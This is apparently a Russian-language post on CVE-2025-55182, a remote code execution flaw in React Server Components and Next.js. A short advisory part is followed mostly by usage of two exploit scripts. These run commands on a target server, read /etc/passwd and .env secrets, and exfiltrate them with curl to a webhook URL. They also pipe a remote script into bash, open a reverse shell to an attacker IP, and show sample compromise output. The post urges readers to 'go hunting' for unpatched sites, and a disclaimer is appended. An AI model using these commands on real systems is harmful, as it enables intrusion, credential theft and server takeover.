CVE-2025-55182
✅ Это означает, что злоумышленники потенциально могут выполнить произвольный серверный код с помощью одного единственного сформированного запроса.
⚠️ Системы, использующие React Server Components, включая:
✅ Пакеты React server DOM
✅ Фреймворки, включающие RSC, такие как:
❌ Не затронуты:
🔍 Сканировать на транзитивные уязвимые пакеты
🧾 Использовать:
npm auditpnpm audityarn audit⚠️ Это только уменьшает риск — они НЕ заменяют исправления
✅ Full-stack разработчики, использующие Next.js App Router
✅ DevOps-команды, размещающие React SSR-приложения
✅ Инженеры по безопасности, мониторящие:
🚨 Если ваше приложение использует React Server Components и не исправлено — оно потенциально полностью скомпрометировано прямо сейчас.
CVE-2025-55182.py (базовое RCE)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (мгновенный реверс-шелл)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Это буквально всё.
Два скрипта, эти 8 команд → полная компрометация любого неисправленного сайта на Next.js сегодня.
Идите за баунти.
Вот что именно вы увидите в реальном времени, когда эксплойт сработает (100% неисправленная цель, 3 декабря 2025):
1. Когда вы запускаете обычный RCE-скрипт (CVE-2025-55182.py)
Вы вводите:
./CVE-2025-55182.py https://target.com "whoami"
Вы мгновенно видите на экране:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ Этот «node» (или то, что возвращает команда) — фактический вывод с сервера жертвы.
Если вы запустите id, вы увидите полные строки uid/gid и т.д.
2. Когда вы запускаете скрипт реверс-шелла (CVE-2025-55182-revshell.py)
Вы вводите:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
Вы мгновенно видите в терминале слушателя:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ Полная интерактивная TTY-оболочка от пользователя node (почти всегда пользователь веб-приложения). Сервер ваш.
Это буквально всё.
Если вы видите что-то из вышеперечисленного → эксплойт сработал на 100 %.
Если вы получаете только HTTP 403/404 или ничего → уже исправлено или заблокировано WAF-ом.
Идите на охоту.
отказ от ответственности
Данный PoC предназначен только для авторизованного тестирования безопасности и образовательных целей.
Не запускайте его против любой системы, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения.
Несанкционированное использование незаконно и может привести к уголовному преследованию.
Используйте только в своей лаборатории, в программах bug-bounty с четкой областью действия или на целях, которые дали вам разрешение.
Вы несете 100 % ответственности за свои действия.